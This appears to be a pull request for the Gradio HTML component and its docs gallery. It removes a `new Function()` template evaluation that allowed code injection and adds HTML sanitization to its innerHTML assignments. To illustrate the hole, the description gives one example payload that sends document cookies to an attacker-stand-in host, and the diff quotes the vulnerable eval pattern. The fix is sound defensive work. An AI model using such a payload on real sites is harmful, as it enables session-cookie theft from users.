### PR TITLE
fix: remove new Function() code injection and add HTML sanitization in HTML component

### DIFF
--- a/js/_website/src/routes/custom-components/html-gallery/utils.ts
+++ b/js/_website/src/routes/custom-components/html-gallery/utils.ts
@@ -1,4 +1,5 @@
 import themeCSS from "$lib/assets/theme.css?raw";
+import Handlebars from "handlebars";
 
 export function clickOutside(
 	element: HTMLDivElement,
@@ -32,15 +33,11 @@ export function needs_iframe(css_template: string | undefined): boolean {
 }
 
 /**
- * Render a component's template string (Handlebars + JS template literals)
- * the same way BaseHTML does, but synchronously in the parent page.
+ * Render a component's template string using Handlebars.
  */
 function render_template(template: string, props: Record<string, any>): string {
 	try {
-		const keys = Object.keys(props);
-		const values = Object.values(props);
-		const fn = new Function(...keys, `return \`${template}\``);
-		return fn(...values);
+		return Handlebars.compile(template)(props);
 	} catch (e) {
 		console.error("Template rendering error:", e);
 		return "";

--- a/js/html/shared/HTML.svelte
+++ b/js/html/shared/HTML.svelte
@@ -2,6 +2,7 @@
 	import { createEventDispatcher } from "svelte";
 	import Handlebars from "handlebars";
 	import type { Snippet } from "svelte";
+	import { sanitize } from "@gradio/sanitize";
 
 	let {
 		elem_classes = [],
@@ -134,20 +135,13 @@
 	): string {
 		try {
 			const handlebarsTemplate = Handlebars.compile(template);
-			const handlebarsRendered = handlebarsTemplate(props);
-
-			const propKeys = Object.keys(props);
-			const propValues = Object.values(props);
-			const templateFunc = new Function(
-				...propKeys,
-				`return \`${handlebarsRendered}\`;`
-			);
+			const rendered = handlebarsTemplate(props);
 			if (language === "html") {
 				html_error_message = null;
 			} else if (language === "css") {
 				css_error_message = null;
 			}
-			return templateFunc(...propValues);
+			return rendered;
 		} catch (e) {
 			console.error("Error evaluating template:", e);
 			if (language === "html") {
@@ -181,7 +175,7 @@
 		if (!_element || oldHtml === newHtml) return;
 
 		const tempContainer = document.createElement("div");
-		tempContainer.innerHTML = newHtml;
+		tempContainer.innerHTML = sanitize(newHtml);
 
 		const oldNodes = Array.from(_element.childNodes);
 		const newNodes = Array.from(tempContainer.childNodes);
@@ -386,16 +380,16 @@
 				reactiveProps,
 				"html"
 			);
-			pre_element.innerHTML = currentPreHtml;
+			pre_element.innerHTML = sanitize(currentPreHtml);
 			currentPostHtml = render_template(
 				post_html_template,
 				reactiveProps,
 				"html"
 			);
-			post_element.innerHTML = currentPostHtml;
+			post_element.innerHTML = sanitize(currentPostHtml);
 		} else {
 			currentHtml = render_template(html_template, reactiveProps, "html");
-			element.innerHTML = currentHtml;
+			element.innerHTML = sanitize(currentHtml);
 		}
 		update_css();
 


### PR DESCRIPTION
## Summary

Two security issues found in the `HTML` custom component:

### 1. Template injection → arbitrary code execution via `new Function()`

`render_template()` in `HTML.svelte` ran Handlebars output through a second evaluation step using `new Function()` with a backtick template literal:

```js
// Before — dangerous
const handlebarsRendered = handlebarsTemplate(props);
const templateFunc = new Function(
    ...propKeys,
    `return \`${handlebarsRendered}\`;`  // backtick template = eval
);
return templateFunc(...propValues);
```

A prop value containing `${fetch('https://attacker.com?c='+document.cookie)}` would execute. Handlebars already handles `{{prop}}` substitution — the `new Function()` step was redundant and dangerous.

```js
// After — safe
const rendered = handlebarsTemplate(props);
return rendered;
```

Same pattern fixed in `html-gallery/utils.ts`, replaced with `Handlebars.compile(template)(props)`.

### 2. `innerHTML` assignments without sanitization

All four `innerHTML` assignments in `HTML.svelte` injected rendered HTML directly with no sanitization, despite `@gradio/sanitize` (amuchina/DOMPurify) already being available in the codebase and used elsewhere (e.g. `MarkdownCode.svelte`, `ToastContent.svelte`).

```js
// Before
element.innerHTML = currentHtml;

// After
element.innerHTML = sanitize(currentHtml);
```

## Files changed

- `js/html/shared/HTML.svelte` — remove `new Function()`, import and apply `sanitize()` on all innerHTML assignments
- `js/_website/src/routes/custom-components/html-gallery/utils.ts` — replace `new Function()` with `Handlebars.compile()`

## Test plan

- [ ] Verify `gr.HTML` component renders `{{value}}` Handlebars templates correctly
- [ ] Verify `gr.HTML` with `js_on_load` still executes (unchanged — that path uses its own `new Function()` intentionally with named params)
- [ ] Verify HTML gallery in docs site renders component previews correctly
- [ ] Confirm a prop value containing `${...}` no longer executes as JavaScript